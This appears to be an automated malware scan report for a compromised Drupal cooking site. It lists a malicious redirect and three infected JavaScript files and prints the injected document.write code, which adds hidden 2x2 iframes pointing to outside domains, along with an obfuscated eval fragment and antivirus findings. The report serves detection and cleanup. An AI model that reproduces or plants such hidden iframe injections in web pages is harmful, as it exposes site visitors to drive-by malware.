Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://helpingyoucook.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: helpingyoucook.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 05 Sep 2014 03:47:22 GMT Location: http://candice-accola.org/mldt.html?h=2164471 Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_auth_passthrough/2.1 Content-Length: 410 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://helpingyoucook.com/ | 200 OK Content-Length: 4110 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/register | 200 OK Content-Length: 4800 Content-Type: text/html | clean |
http://helpingyoucook.com/misc/jquery.js?B | 200 OK Content-Length: 24576 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://findautorebates.com/eagn.html?j=847453></iframe>'); eval(function(p ...[3345 bytes skipped]... Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://motorscooters.com/oldy.html?j=2164471 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471> Hidden iFrame found. size: 2x2 src: http://findautorebates.com/eagn.html?j=847453 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://findautorebates.com/eagn.html?j=847453> Malicious iFrame found. size: 2x2 src: http://bandofbros.us/ehgu.html?j=847453 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453> Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/empu.html?j=847453 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453> Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mldt.html?j=2164471 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471> | ||
http://helpingyoucook.com/misc/drupal.js?B | 200 OK Content-Length: 10809 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://findautorebates.com/eagn.html?j=847453></iframe>'); var Drupal = Dr ...[3580 bytes skipped]... Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mldt.html?j=2164471 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471> Hidden iFrame found. size: 2x2 src: http://motorscooters.com/oldy.html?j=2164471 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471> Malicious iFrame found. size: 2x2 src: http://bandofbros.us/ehgu.html?j=847453 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453> Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/empu.html?j=847453 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453> Hidden iFrame found. The same iFrame was found in 9 websites. size: 2x2 src: http://offtherunwayhairstudio.com/ahgu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahgu.html> Hidden iFrame found. size: 2x2 src: http://findautorebates.com/eagn.html?j=847453 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://findautorebates.com/eagn.html?j=847453> | ||
http://helpingyoucook.com/modules/user/user.js?B | 200 OK Content-Length: 7837 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: bandofbros.us document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453></iframe>'); Drupal.behaviors.password = function(context) { var translate = Drupal.settings.password; $("input.password-field:not(.password-processed)", context).each(function() { var passwo ...[3566 bytes skipped]... Decoded script: <iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453></iframe><iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453></iframe> Hidden iFrame found. size: 2x2 src: http://motorscooters.com/oldy.html?j=2164471 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://motorscooters.com/oldy.html?j=2164471> Malicious iFrame found. size: 2x2 src: http://bandofbros.us/ehgu.html?j=847453 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bandofbros.us/ehgu.html?j=847453> Hidden iFrame found. The same iFrame was found in 9 websites. size: 2x2 src: http://offtherunwayhairstudio.com/ahgu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahgu.html> Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/empu.html?j=847453 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/empu.html?j=847453> Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mldt.html?j=2164471 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mldt.html?j=2164471> | ||
http://helpingyoucook.com/?q=user | 200 OK Content-Length: 3153 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/password | 200 OK Content-Length: 2799 Content-Type: text/html | clean |
http://helpingyoucook.com/test404page.js | 404 Not Found Content-Length: 512 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=node/3 | 200 OK Content-Length: 3755 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/login&destination=comment%2Freply%2F3%23comment-form | 200 OK Content-Length: 3195 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/register&destination=comment%2Freply%2F3%23comment-form | 200 OK Content-Length: 4851 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=node/2 | 200 OK Content-Length: 3700 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/login&destination=comment%2Freply%2F2%23comment-form | 200 OK Content-Length: 3195 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=user/register&destination=comment%2Freply%2F2%23comment-form | 200 OK Content-Length: 4851 Content-Type: text/html | clean |
http://helpingyoucook.com/?q=rss.xml | 200 OK Content-Length: 1135 Content-Type: application/rss+xml | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=helpingyoucook.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://helpingyoucook.com/
Result: helpingyoucook.com is not infected or malware details are not published yet.
Result: helpingyoucook.com is not infected or malware details are not published yet.